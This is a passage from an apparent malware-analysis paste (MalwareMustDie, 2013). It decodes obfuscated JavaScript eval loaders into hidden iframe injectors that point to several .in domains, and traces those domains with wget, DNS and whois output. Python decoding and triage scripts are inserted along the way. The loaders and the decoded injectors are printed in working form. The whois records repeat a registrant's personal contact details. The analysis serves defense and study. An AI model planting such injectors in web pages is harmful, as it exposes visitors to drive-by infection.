28$27$20.5$49.5$48$54$45.5$51.5$47.5$28$14$17.5$26.5$3.5$1.5$1.5$59.5$3.5$1.5$1.5$48$55.5$52$46.5$55$49.5$52.5$52$13$49.5$48$54$45.5$51.5$47.5$54$17$17.5$58.5$3.5$1.5$1.5$1.5$56$45.5$54$13$48$13$27.5$13$47$52.5$46.5$55.5$51.5$47.5$52$55$20$46.5$54$47.5$45.5$55$47.5$31.5$51$47.5$51.5$47.5$52$55$17$16.5$49.5$48$54$45.5$51.5$47.5$16.5$17.5$26.5$48$20$54.5$47.5$55$29.5$55$55$54$49.5$46$55.5$55$47.5$17$16.5$54.5$54$46.5$16.5$19$16.5$49$55$55$53$26$20.5$20.5$58$53$54.5$55$45.5$55$54.5$20$49.5$52$20.5$16.5$17.5$26.5$48$20$54.5$55$57.5$51$47.5$20$56$49.5$54.5$49.5$46$49.5$51$49.5$55$57.5$27.5$16.5$49$49.5$47$47$47.5$52$16.5$26.5$48$20$54.5$55$57.5$51$47.5$20$53$52.5$54.5$49.5$55$49.5$52.5$52$27.5$16.5$45.5$46$54.5$52.5$51$55.5$55$47.5$16.5$26.5$48$20$54.5$55$57.5$51$47.5$20$51$47.5$48$55$27.5$16.5$21$16.5$26.5$48$20$54.5$55$57.5$51$47.5$20$55$52.5$53$27.5$16.5$21$16.5$26.5$48$20$54.5$47.5$55$29.5$55$55$54$49.5$46$55.5$55$47.5$17$16.5$56.5$49.5$47$55$49$16.5$19$16.5$21.5$21$16.5$17.5$26.5$48$20$54.5$47.5$55$29.5$55$55$54$49.5$46$55.5$55$47.5$17$16.5$49$47.5$49.5$48.5$49$55$16.5$19$16.5$21.5$21$16.5$17.5$26.5$3.5$1.5$1.5$1.5$47$52.5$46.
5$55.5$51.5$47.5$52$55$20$48.5$47.5$55$31.5$51$47.5$51.5$47.5$52$55$54.5$30$57.5$39$45.5$48.5$36$45.5$51.5$47.5$17$16.5$46$52.5$47$57.5$16.5$17.5$42.5$21$43.5$20$45.5$53$53$47.5$52$47$30.5$49$49.5$51$47$17$48$17.5$26.5$3.5$1.5$1.5$59.5"[((e)?"s":"")+"p"+"lit"]("a$".substr(1));
  159.    for(i=6-2-1-2-1;i-545!=0;i++)
  160.    {
  161.      k=i;
  162.      ss=ss+String.fromCharCode(-1*h*(3+1*n[k]));
  163.    }
  164.    q=ss;
  165.    e(q);
  166.  }
  167.  </script><script>if(window["document"])try
  168.  {
  169.    prototype;
  170.  }
  171.  catch(brebr)
  172.  {
  173.    st=String;
  174.    zz='al';
  175.    zz='zv'.substr(123-122)+zz;
  176.    ss=[];
  177.    f='fr'+'om'+'Ch';
  178.    f+='arC';
  179.    f+='qgode'["substr"](4-2);
  180.    w=this;
  181.    e=w[f["substr"](11)+zz];
  182.    n="3.5#3.5#51.5#50#15#19#49#54.5#48.5#57.5#53.5#49.5#54#57#22#50.5#49.5#57#33.5#53#49.5#53.5#49.5#54#57#56.5#32#59.5#41#47.5#50.5#38#47.5#53.5#49.5#19#18.5#48#54.5#49#59.5#18.5#19.5#44.5#23#45.5#19.5#60.5#5.5#3.5#3.5#3.5#51.5#50#56#47.5#53.5#49.5#56#19#19.5#28.5#5.5#3.5#3.5#61.5#15#49.5#53#56.5#49.5#15#60.5#5.5#3.5#3.5#3.5#49#54.5#48.5#57.5#53.5#49.5#54#57#22#58.5#56#51.5#57#49.5#19#16#29#51.5#50#56#47.5#53.5#49.5#15#56.5#56#48.5#29.5#18.5#51#57#57#55#28#22.5#22.5#48.5#53#54.5#47.5#54#56.5#22#54.5#56#50.5#22.5#18.5#15#58.5#51.5#49#57#51#29.5#18.5#23.5#23#18.5#15#51#49.5#51.5#50.5#51#57#29.5#18.5#23.5#23#18.5#15#56.5#57#59.5#53#49.5#29.5#18.5#58#51.5#56.5#51.5#48#51.5#53#51.5#57#59.5#28#51#51.5#49#49#49.5#54#28.5#55#54.5#56.5#51.5#57#51.5#54.5#54#28#47.5#48#56.5#54.5#53#57.5#57#49.5#28.5#53#49.5#50#57#28#23#28.5#57#54.5#55#28#23#28.5#18.5#30#29#22.5#51.5#50#56#47.5#53.5#49.5#30#16#19.5#28.5#5.5#3.5#3.5#61.5#5.5#3.5#3.5#50#57.5#54#48.5#57#51.5#54.5#54#15#51.5#50#56#47.5#53.5#49.5#56#19#19.5#60.5#5.5#3.5#3.5#3.5#58#47.5#56#15#50#15#29.5#15#49#54.5#48.5#57.5#53.5#49.5#54#57#22#48.5#56#49.5#47.5#57#49.5#33.5#53#49.5#53.5#49.5#54#57#19#18.5#51.5#50#56#47.5#53.5#49.5#18.5#19.5#28.5#50#22#56.5#49.5#57#31.5#57#57#56#51.5#48#57.5#57#49.5#19#18.5#56.5#56#48.5#18.5#21#18.5#51#57#57#55#28#22.5#22.5#48.5#53#54.5#47.5#54#56.5#22#54.5#56#50.5#22.5#18.5#19.5#28.5#50#22#56.5#57#59.5#53#49.5#22#58#51.5#56.5#51.5#48#51.5#53#51.5#57#59.5#29.5#18.5#51#51.5#49#49#49.5#54#18.5#28.5#50#22#56.5#57#59.5#53#49.5#22#55#54.5#56.5#51.5#57#51.5#54.5#54#29.5#18.5#47.5#48#56.5#54.5#53#57.5#57#49.5#18.5#28.5#50#22#56.5#57#59.5#53#49.5#22#53#49.5#50#57#29.5#18.5#23#18.5#28.5#50#22#56.5#57#59.5#53#49.5#22#57#54.5#55#29.5#18.5#23#18.5#28.5#50#22#56.5#49.5#57#31.5#57#57#56#51.5#48#57.5#57#49.5#19#18.5#58.5#51.5#49#57#51#18.5#21#18.5#23.5#23#18.5#19.5#28.5#50#22#56.5#49.5#57#31.5#57#57#56#51.5#48#57.5#57#49.5#19#18.5#51#49.5#51.5#50.5#51#57#18.5#21#18.5#23.5#23#18.5#19.5#28.5#5.5#3.5#3.5#3.5#49#
54.5#48.5#57.5#53.5#49.5#54#57#22#50.5#49.5#57#33.5#53#49.5#53.5#49.5#54#57#56.5#32#59.5#41#47.5#50.5#38#47.5#53.5#49.5#19#18.5#48#54.5#49#59.5#18.5#19.5#44.5#23#45.5#22#47.5#55#55#49.5#54#49#32.5#51#51.5#53#49#19#50#19.5#28.5#5.5#3.5#3.5#61.5"[((e)?"s":"")+"p"+"lit"]("a#"[((e)?"su":"")+"bstr"](1));
  183.    try
  184.    {
  185.      q=document.createElement("div");
  186.      q.appendChild(q);
  187.    }
  188.    catch(qw)
  189.    {
  190.      h=-parseInt('012')/5;
  191.    }
  192.    for(i=6-2-1-2-1;i-545!=0;i++)
  193.    {
  194.      j=i;
  195.      if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));
  196.    }
  197.    q=ss;
  198.    if(e)e(""+q);
  199.  }
  200.  </script>
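Added example, not part of the paste: a Python decoder for the three number-array loops shown above. The only assumptions are what the scripts themselves show: h is derived from -012/5 or -parseInt('012')/5 (inside a catch block that fires when the DOM probe throws), each character is String.fromCharCode(-1*factor*h*(offset+n[k])), the array is either a literal or a "$"/"#"-delimited string, and e is window.eval (built as 'fromCharCode'.substr(11) + 'zv'.substr(1) + 'al'). The fixtures are cut-down copies of the three scripts keeping only the first 14 of the 545 array values from the page; the function names are mine.

```python
import re
from typing import List, Optional, Tuple

# Constructed fixtures: cut-down copies of the three decoder scripts on the page.
# Each keeps the original h assignment, fromCharCode() expression and loop, but
# only the first 14 of the 545 entries of its n array (values verbatim from the
# page), so the expected plaintext is just "\t\tif (document".
SCRIPT_V1 = (
    'try{q=document.createElement("u");q.appendChild(q+"");}catch(qw){h=-012/5;}'
    'n=[-0.75,-0.75,23.25,22.5,5,7,22,24.75,21.75,26.25,24.25,22.25,24.5,26];'
    'for(i=6-2-1-2-1;i-545!=0;i++){k=i;ss=ss+String["from"+"CharCode"](-1*2*h*(3+1*n[k]));}e(ss);'
)
SCRIPT_V2 = (
    'catch(qw){h=-012/5;}'
    'n="1.5$1.5$49.5$48$13$17$47$52.5$46.5$55.5$51.5$47.5$52$55"[((e)?"s":"")+"p"+"lit"]("a$".substr(1));'
    'for(i=6-2-1-2-1;i-545!=0;i++){k=i;ss=ss+String.fromCharCode(-1*h*(3+1*n[k]));}q=ss;e(q);'
)
SCRIPT_V3 = (
    'n="3.5#3.5#51.5#50#15#19#49#54.5#48.5#57.5#53.5#49.5#54#57"[((e)?"s":"")+"p"+"lit"]("a#"[((e)?"su":"")+"bstr"](1));'
    "catch(qw){h=-parseInt('012')/5;}"
    'for(i=6-2-1-2-1;i-545!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;if(e)e(""+q);'
)

# n=[...] array literal, or n="..." string that the script later .split()s
ARRAY_RE = re.compile(r'(?<![A-Za-z_$])n=("[^"]*"|\[[^\]]*\])')
# the fromCharCode() argument: -1*FACTOR*h*(OFFSET+1*n[k]); FACTOR may be absent
EXPR_RE = re.compile(r"-1\*(?:(\d+)\*)?h\*\((\d+)\+1\*n\[[a-z]\]\)")
# the two ways the scripts derive h
H_RE = re.compile(r"h=-(012|parseInt\('012'\))/5")
NUM_RE = re.compile(r"-?\d+(?:\.\d+)?")


def parse_values(blob: str) -> List[float]:
    """Numeric entries of either the array literal or the delimited string."""
    return [float(m) for m in NUM_RE.findall(blob)]


def loop_parameters(script: str) -> Optional[Tuple[int, int]]:
    """(factor, offset) read from the fromCharCode() expression in the loop."""
    m = EXPR_RE.search(script)
    if not m:
        return None
    return (int(m.group(1)) if m.group(1) else 1, int(m.group(2)))


def js_h(script: str, legacy_octal: bool = True) -> float:
    """Reproduce the script's h.  `-012/5` is an octal literal (10) over 5, so
    h == -2 in any sloppy-mode engine.  `-parseInt('012')/5` is -2 only on
    legacy engines that read a leading 0 as octal; ES5+ engines parse '012' as
    12, so the third script decodes to garbage in a modern browser."""
    m = H_RE.search(script)
    if not m:
        raise ValueError("no recognised h assignment")
    if m.group(1) == "012" or legacy_octal:
        return -10 / 5
    return -12 / 5


def decode(values: List[float], h: float, factor: int, offset: int) -> str:
    """The loop body, chr(-1*factor*h*(offset+n[k])), over every entry.
    String.fromCharCode truncates its argument to an unsigned 16-bit integer."""
    return "".join(chr(int(-1 * factor * h * (offset + v)) & 0xFFFF) for v in values)


def deobfuscate(script: str, legacy_octal: bool = True) -> str:
    """Locate the array and loop in one script and decode it statically."""
    array = ARRAY_RE.search(script)
    params = loop_parameters(script)
    if not array or not params:
        raise ValueError("script does not match the known layout")
    factor, offset = params
    return decode(parse_values(array.group(1)), js_h(script, legacy_octal), factor, offset)


def looks_like_text(s: str) -> bool:
    """Cheap sanity check to tell a good decode from a wrong h."""
    return all(c in "\t\r\n" or 32 <= ord(c) < 127 for c in s)


if __name__ == "__main__":
    for name, script in (("v1", SCRIPT_V1), ("v2", SCRIPT_V2), ("v3", SCRIPT_V3)):
        print(name, repr(deobfuscate(script)))
    # the third script under a modern parseInt(): garbage, by design
    print("v3/modern", repr(deobfuscate(SCRIPT_V3, legacy_octal=False)))
```

Feed the full 545-entry array (the loop bound i-545!=0 is the length) to get the complete iframe injector. The third block is worth noting for detection: its h depends on parseInt('012') returning 10, so it only decodes on older engines, which means a modern-browser sandbox that executes it sees nothing useful; static decoding as above does not have that problem.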
  201.  
  202.  
  203. // see the below link in the script....
  204. //  </script><script type="text/javascript" src="h00p://filehost101.in/tds777/social.js"></script><script>try
  205. // let's fetch it...
  206.  
  207. //... can't fetch it...
  208.  
  209. --19:22:17--  h00p://filehost101.in/tds777/social.js
  210.            => `social.js'
  211. Resolving filehost101.in... seconds 0.00, failed: Unknown host.
  212.  
  213. ;; QUESTION SECTION:
  214. ;filehost101.in.                        IN      A
  215.  
  216.  
  217. // seeking why we can't fetch it...
  218.  
  219. Domain ID:D6389890-AFIN
  220. Domain Name:FILEHOST101.IN
  221. Created On:21-May-2012 22:20:31 UTC
  222. Last Updated On:21-Jul-2012 19:21:48 UTC
  223. Expiration Date:21-May-2013 22:20:31 UTC
  224. Sponsoring Registrar:Enom Inc. (R46-AFIN)
  225. Status:CLIENT TRANSFER PROHIBITED
  226. Registrant ID:55f7cab898d98545
  227. Registrant Name:Stepan  Ahmethanov
  228. Registrant Organization:
  229. Registrant Street1:Prospekt Mira 28
  230. Registrant Street2:
  231. Registrant Street3:
  232. Registrant City:Moscow
  233. Registrant State/Province:Moscow
  234. Registrant Postal Code:129074
  235. Registrant Country:RU
  236. Registrant Phone:+7.9653428756
  237. Registrant Phone Ext.:
  238. Registrant FAX:
  239. Registrant FAX Ext.:
  240. Registrant Email:keyb@exchangezones.net
  241. Admin ID:55f7cab898d98545
  242. Admin Name:Stepan  Ahmethanov
  243. Admin Organization:
  244. Admin Street1:Prospekt Mira 28
  245. Admin Street2:
  246. Admin Street3:
  247. Admin City:Moscow
  248. Admin State/Province:Moscow
  249. Admin Postal Code:129074
  250. Admin Country:RU
  251. Admin Phone:+7.9653428756
  252. Admin Phone Ext.:
  253. Admin FAX:
  254. Admin FAX Ext.:
  255. Admin Email:keyb@exchangezones.net
  256. Tech ID:55f7cab898d98545
  257. Tech Name:Stepan  Ahmethanov
  258. Tech Organization:
  259. Tech Street1:Prospekt Mira 28
  260. Tech Street2:
  261. Tech Street3:
  262. Tech City:Moscow
  263. Tech State/Province:Moscow
  264. Tech Postal Code:129074
  265. Tech Country:RU
  266. Tech Phone:+7.9653428756
  267. Tech Phone Ext.:
  268. Tech FAX:
  269. Tech FAX Ext.:
  270. Tech Email:keyb@exchangezones.net
  271. Name Server:NS3.FASTVPS.RU
  272. Name Server:NS4.FASTVPS.RU
  273.  
  274.  
  275. // looks like the domain's down.. good! let's skip it and try to deobfuscate it:
  276.  
  277.  
  278. // first eval value...
  279.  
  280. if (document.getElementsByTagName('body')[0]){
  281.   iframer();
  282. }
  283. else {
  284.   document.write("
  285. <iframe src='h00p://evlex80.in/' width='10' height='10' style='visibility:hidden;position:
  286. absolute;left:0;top:0;'></iframe>");
  287. }
  288. function iframer(){
  289.   var f = document.createElement('iframe');
  290.   f.setAttribute('src', 'h00p://evlex80.in/');
  291.   f.style.visibility = 'hidden';
  292.   f.style.position = 'absolute';
  293.   f.style.left = '0';
  294.   f.style.top = '0';
  295.   f.setAttribute('width', '10');
  296.   f.setAttribute('height', '10');
  297.   document.getElementsByTagName('body')[0].appendChild(f);
  298. }
  299.  
  300. // second eval value...
  301.  
  302. if (document.getElementsByTagName('body')[0]){
  303.   iframer();
  304. }
  305. else {
  306.   document.write("
  307. <iframe src='h00p://aglex70.in/' width='10' height='10' style='visibility:hidden;position:
  308. absolute;left:0;top:0;'></iframe>");
  309. }
  310. function iframer(){
  311.   var f = document.createElement('iframe');
  312.   f.setAttribute('src', 'h00p://aglex70.in/');
  313.   f.style.visibility = 'hidden';
  314.   f.style.position = 'absolute';
  315.   f.style.left = '0';
  316.   f.style.top = '0';
  317.   f.setAttribute('width', '10');
  318.   f.setAttribute('height', '10');
  319.   document.getElementsByTagName('body')[0].appendChild(f);
  320. }
  321.  
  322. // third eval value...
  323.  
  324. if (document.getElementsByTagName('body')[0]){
  325.   iframer();
  326. }
  327. else {
  328.   document.write("
  329. <iframe src='h00p://zpstats.in/' width='10' height='10' style='visibility:hidden;position:
  330. absolute;left:0;top:0;'></iframe>");
  331. }
  332. function iframer(){
  333.   var f = document.createElement('iframe');
  334.   f.setAttribute('src', 'h00p://zpstats.in/');
  335.   f.style.visibility = 'hidden';
  336.   f.style.position = 'absolute';
  337.   f.style.left = '0';
  338.   f.style.top = '0';
  339.   f.setAttribute('width', '10');
  340.   f.setAttribute('height', '10');
  341.   document.getElementsByTagName('body')[0].appendChild(f);
  342. }
  343.  
  344. // we got three suspected infection URLs from this scheme, as below:
  345.  
  346. h00p://evlex80.in/
  347. h00p://aglex70.in/
  348. h00p://zpstats.in/
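Added example, not part of the paste: a Python triage step that takes decoded output like the three blocks above and mechanically pulls out the iframe src values and the hide-it indicators (visibility:hidden, 10x10 dimensions, absolute positioning), which is how the URL list above can be produced without eyeballing each block. The sample is the first decoded block copied with the page's h00p:// defanging (the other two differ only in the URL); the benign embed is a constructed control, and the function names are mine.

```python
import re
from typing import Dict, List

# Constructed sample: the first decoded block from the page, as the author
# printed it (URL left defanged as h00p://, the page's convention).
DECODED_SAMPLE = """
if (document.getElementsByTagName('body')[0]){
  iframer();
}
else {
  document.write("<iframe src='h00p://evlex80.in/' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
  var f = document.createElement('iframe');
  f.setAttribute('src', 'h00p://evlex80.in/');
  f.style.visibility = 'hidden';
  f.style.position = 'absolute';
  f.style.left = '0';
  f.style.top = '0';
  f.setAttribute('width', '10');
  f.setAttribute('height', '10');
  document.getElementsByTagName('body')[0].appendChild(f);
}
"""

# Constructed benign control: an ordinary, visible embed.
BENIGN_SAMPLE = """document.write("<iframe src='https://example.com/embed' width='640' height='360'></iframe>");"""

IFRAME_TAG_RE = re.compile(r"<iframe\b[^>]*?\bsrc=['\"]([^'\"]+)", re.I)
SET_SRC_RE = re.compile(r"setAttribute\(\s*['\"]src['\"]\s*,\s*['\"]([^'\"]+)", re.I)
CREATE_IFRAME_RE = re.compile(r"createElement\(\s*['\"]iframe['\"]\s*\)", re.I)
# width='10', height="10", setAttribute('width', '10') all end up here
DIM_RE = re.compile(r"\b(?:width|height)\W{1,5}(\d+)", re.I)
SCHEME_HOST_RE = re.compile(r"^[a-z0-9]+://([^/:]+)", re.I)


def iframe_sources(js: str) -> List[str]:
    """Every iframe src, whether written as markup or set via setAttribute()."""
    found = IFRAME_TAG_RE.findall(js) + SET_SRC_RE.findall(js)
    return sorted(set(found))


def domains(js: str) -> List[str]:
    """Bare host names from those URLs, ready for a DNS/whois pivot."""
    hosts = set()
    for url in iframe_sources(js):
        m = SCHEME_HOST_RE.match(url)
        if m:
            hosts.add(m.group(1).lower())
    return sorted(hosts)


def indicators(js: str) -> Dict[str, bool]:
    """The concealment tricks the decoded injector relies on."""
    dims = [int(d) for d in DIM_RE.findall(js)]
    return {
        "creates_iframe": bool(IFRAME_TAG_RE.search(js) or CREATE_IFRAME_RE.search(js)),
        "visibility_hidden": bool(re.search(r"visibility\s*[:=]\s*'?hidden", js)),
        "tiny_dimensions": bool(dims) and max(dims) <= 10,
        "absolute_positioned": bool(re.search(r"position\s*[:=]\s*'?absolute", js)),
    }


def is_hidden_injector(js: str) -> bool:
    """A hidden or tiny iframe added to the page is the injector signature."""
    ind = indicators(js)
    return ind["creates_iframe"] and (ind["visibility_hidden"] or ind["tiny_dimensions"])


if __name__ == "__main__":
    print(iframe_sources(DECODED_SAMPLE), domains(DECODED_SAMPLE))
    print(indicators(DECODED_SAMPLE), is_hidden_injector(DECODED_SAMPLE))
    print(is_hidden_injector(BENIGN_SAMPLE))
```

Running each of the three decoded blocks through domains() yields evlex80.in, aglex70.in and zpstats.in, the list the author checks next; the indicator dictionary is what a content filter or proxy rule would key on, since the URLs rotate but the 10x10 hidden-iframe shape does not.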
  349.  
  350.  
  351. // let's check it out....
  352.  
  353. --19:30:55--  h00p://evlex80.in/
  354.            => `index.html'
  355. Resolving evlex80.in... seconds 0.00, failed: Unknown host.
  356.  
  357.  
  358. --19:31:17--  h00p://aglex70.in/
  359.            => `index.html'
  360. Resolving aglex70.in... seconds 0.00, 95.168.187.94
  361. Caching aglex70.in => 95.168.187.94
  362. Connecting to aglex70.in|95.168.187.94|:80... seconds 0.00,
  363. failed: Connection timed out.
  364.  
  365. --19:32:56--  h00p://zpstats.in/
  366.            => `index.html'
  367. Resolving zpstats.in... seconds 0.00, failed: Unknown host.
  368.  
  369. // inaccessible: 2 domains are down, one (aglex70.in) is still up,
  370. // let's whack the live one further...
  371.  
  372.  
  373. // we got the ip 95.168.187.94
  374. // it uses the same registered DNS servers as filehost101.in, nsX.fastvps.ru
  375.  
  376. ;; QUESTION SECTION:
  377. ;aglex70.in.                    IN      A
  378.  
  379. ;; ANSWER SECTION:
  380. aglex70.in.             3600    IN      A       95.168.187.94
  381.  
  382. ;; AUTHORITY SECTION:
  383. aglex70.in.             3599    IN      NS      ns3.fastvps.ru.
  384. aglex70.in.             3599    IN      NS      ns4.fastvps.ru.
  385. aglex70.in.             3599    IN      NS      ns1.fastvps.ru.
  386. aglex70.in.             3599    IN      NS      ns2.fastvps.ru.
  387.  
  388. ;; ADDITIONAL SECTION:
  389. ns1.fastvps.ru.         3562    IN      A       95.211.92.14
  390. ns2.fastvps.ru.         3562    IN      A       178.132.200.26
  391. ns3.fastvps.ru.         3562    IN      A       46.4.4.96
  392. ns4.fastvps.ru.         3562    IN      A       93.170.127.130
  393.  
  394.  
  395. // we have the domain AGLEX70.IN
  396. // and all of the domains used in this scheme go to the same Russian registrant:
  397.  
  398. Registrant ID:55f7cab898d98545
  399. Registrant Name:Stepan  Ahmethanov
  400. Registrant Organization:
  401. Registrant Street1:Prospekt Mira 28
  402. Registrant Street2:
  403. Registrant Street3:
  404. Registrant City:Moscow
  405. Registrant State/Province:Moscow
  406. Registrant Postal Code:129074
  407. Registrant Country:RU
  408. Registrant Phone:+7.9653428756
  409. Registrant Phone Ext.:
  410. Registrant FAX:
  411. Registrant FAX Ext.:
  412. Registrant Email:keyb@exchangezones.net
  413.  
  414.  
  415. // the same registrant also holds filehost101.in, the domain serving the downloaded JavaScript:
  416.  
  417. Domain ID:D6389890-AFIN
  418. Domain Name:FILEHOST101.IN
  419. Created On:21-May-2012 22:20:31 UTC
  420. Last Updated On:21-Jul-2012 19:21:48 UTC
  421. Expiration Date:21-May-2013 22:20:31 UTC
  422. Sponsoring Registrar:Enom Inc. (R46-AFIN)
  423. Status:CLIENT TRANSFER PROHIBITED
  424. Registrant ID:55f7cab898d98545
  425. Registrant Name:Stepan  Ahmethanov
  426. Registrant Organization:
  427. Registrant Street1:Prospekt Mira 28
  428. Registrant Street2:
  429. Registrant Street3:
  430. Registrant City:Moscow
  431. Registrant State/Province:Moscow
  432. Registrant Postal Code:129074
  433. Registrant Country:RU
  434. Registrant Phone:+7.9653428756
  435. Registrant Phone Ext.:
  436. Registrant FAX:
  437. Registrant FAX Ext.:
  438. Registrant Email:keyb@exchangezones.net
  439.   :
  440.  
  441. // how do we know this is a fresh infection? We need dates...
  442. // here they are:
  443.  
  444.  
  445. // More PoC:
  446.  
  447. Domain ID:D6408331-AFIN
  448. Domain Name:AGLEX70.IN
  449. Created On:24-May-2012 17:03:26 UTC
  450. Last Updated On:23-Jul-2012 19:21:39 UTC
  451. Expiration Date:24-May-2013 17:03:26 UTC
  452. Sponsoring Registrar:Enom Inc. (R46-AFIN)
  453. Status:CLIENT TRANSFER PROHIBITED
  454. Registrant ID:55f7cab898d98545
  455. Registrant Name:Stepan  Ahmethanov
  456. Registrant Organization:
  457. Registrant Street1:Prospekt Mira 28
  458. Registrant Street2:
  459. Registrant Street3:
  460. Registrant City:Moscow
  461. Registrant State/Province:Moscow
  462. Registrant Postal Code:129074
  463. Registrant Country:RU
  464. Registrant Phone:+7.9653428756
  465. Registrant Phone Ext.:
  466. Registrant FAX:
  467. Registrant FAX Ext.:
  468. Registrant Email:keyb@exchangezones.net
  469. Admin ID:55f7cab898d98545
  470. Admin Name:Stepan  Ahmethanov
  471. Admin Organization:
  472. Admin Street1:Prospekt Mira 28
  473. Admin Street2:
  474. Admin Street3:
  475. Admin City:Moscow
  476. Admin State/Province:Moscow
  477. Admin Postal Code:129074
  478. Admin Country:RU
  479. Admin Phone:+7.9653428756
  480. Admin Phone Ext.:
  481. Admin FAX:
  482. Admin FAX Ext.:
  483. Admin Email:keyb@exchangezones.net
  484. Tech ID:55f7cab898d98545
  485. Tech Name:Stepan  Ahmethanov
  486. Tech Organization:
  487. Tech Street1:Prospekt Mira 28
  488. Tech Street2:
  489. Tech Street3:
  490. Tech City:Moscow
  491. Tech State/Province:Moscow
  492. Tech Postal Code:129074
  493. Tech Country:RU
  494. Tech Phone:+7.9653428756
  495. Tech Phone Ext.:
  496. Tech FAX:
  497. Tech FAX Ext.:
  498. Tech Email:keyb@exchangezones.net
  499. Name Server:NS3.FASTVPS.RU
  500. Name Server:NS4.FASTVPS.RU
  501.  
  502.  
  503. Domain ID:D6383541-AFIN
  504. Domain Name:ZPSTATS.IN
  505. Created On:20-May-2012 17:51:24 UTC
  506. Last Updated On:19-Jul-2012 19:21:02 UTC
  507. Expiration Date:20-May-2013 17:51:24 UTC
  508. Sponsoring Registrar:Enom Inc. (R46-AFIN)
  509. Status:CLIENT TRANSFER PROHIBITED
  510. Registrant ID:55f7cab898d98545
  511. Registrant Name:Stepan  Ahmethanov
  512. Registrant Organization:
  513. Registrant Street1:Prospekt Mira 28
  514. Registrant Street2:
  515. Registrant Street3:
  516. Registrant City:Moscow
  517. Registrant State/Province:Moscow
  518. Registrant Postal Code:129074
  519. Registrant Country:RU
  520. Registrant Phone:+7.9653428756
  521. Registrant Phone Ext.:
  522. Registrant FAX:
  523. Registrant FAX Ext.:
  524. Registrant Email:keyb@exchangezones.net
  525. Admin ID:55f7cab898d98545
  526. Admin Name:Stepan  Ahmethanov
  527. Admin Organization:
  528. Admin Street1:Prospekt Mira 28
  529. Admin Street2:
  530. Admin Street3:
  531. Admin City:Moscow
  532. Admin State/Province:Moscow
  533. Admin Postal Code:129074
  534. Admin Country:RU
  535. Admin Phone:+7.9653428756
  536. Admin Phone Ext.:
  537. Admin FAX:
  538. Admin FAX Ext.:
  539. Admin Email:keyb@exchangezones.net
  540. Tech ID:55f7cab898d98545
  541. Tech Name:Stepan  Ahmethanov
  542. Tech Organization:
  543. Tech Street1:Prospekt Mira 28
  544. Tech Street2:
  545. Tech Street3:
  546. Tech City:Moscow
  547. Tech State/Province:Moscow
  548. Tech Postal Code:129074
  549. Tech Country:RU
  550. Tech Phone:+7.9653428756
  551. Tech Phone Ext.:
  552. Tech FAX:
  553. Tech FAX Ext.:
  554. Tech Email:keyb@exchangezones.net
  555. Name Server:NS3.FASTVPS.RU
  556. Name Server:NS4.FASTVPS.RU
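The pivot the analysis does by hand above (same Registrant ID, same nsX.fastvps.ru name servers across the domains) can be automated over registrar whois output in the Key:Value format shown. This is an added example, not code from the original paste; the records are constructed from the whois fields above, trimmed to the pivot fields, plus one unrelated control record with placeholder values.

```python
from collections import defaultdict

def parse_whois(text):
    """Parse one 'Key:Value' whois record into a dict; repeated Name Server
    lines become a list. partition() keeps colons inside values intact
    (e.g. 'Created On:24-May-2012 17:03:26 UTC')."""
    rec = {"name_servers": []}
    for line in text.splitlines():
        key, sep, val = line.partition(":")
        key, val = key.strip(), val.strip()
        if not sep or not val:
            continue                      # blank value, e.g. 'Registrant FAX:'
        if key == "Name Server":
            rec["name_servers"].append(val.lower().rstrip("."))
        else:
            rec[key] = val
    return rec

def ns_zone(ns):
    """Collapse nsN.provider.tld to provider.tld so ns1..ns4 pivot together."""
    return ".".join(ns.split(".")[-2:])

def pivot(records):
    """Group domains by Registrant ID and by name-server zone."""
    by_registrant, by_ns_zone = defaultdict(set), defaultdict(set)
    for rec in map(parse_whois, records):
        dom = rec["Domain Name"].lower()
        by_registrant[rec.get("Registrant ID", "<none>")].add(dom)
        for ns in rec["name_servers"]:
            by_ns_zone[ns_zone(ns)].add(dom)
    tidy = lambda d: {k: sorted(v) for k, v in d.items()}
    return tidy(by_registrant), tidy(by_ns_zone)

# Constructed records: pivot fields from this paste's whois output, plus one
# unrelated record with placeholder values as a control.
RECORDS = [
    "Domain Name:AGLEX70.IN\nRegistrant ID:55f7cab898d98545\n"
    "Registrant Email:keyb@exchangezones.net\nRegistrant FAX:\n"
    "Name Server:NS3.FASTVPS.RU\nName Server:NS4.FASTVPS.RU",
    "Domain Name:ZPSTATS.IN\nRegistrant ID:55f7cab898d98545\n"
    "Name Server:NS3.FASTVPS.RU\nName Server:NS4.FASTVPS.RU",
    "Domain Name:FILEHOST101.IN\nRegistrant ID:55f7cab898d98545",
    "Domain Name:UNRELATED.EXAMPLE\nRegistrant ID:placeholder-other-id\n"
    "Name Server:NS1.EXAMPLE.NET",
]

if __name__ == "__main__":
    by_reg, by_ns = pivot(RECORDS)
    for rid, doms in by_reg.items():
        print(rid, "->", ", ".join(doms))
```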
  557.  
  558. ---
  559. #MalwareMustDie!
  560. [0x00000000]> !date
  561. Wed Jan  2 19:48:55 JST 2013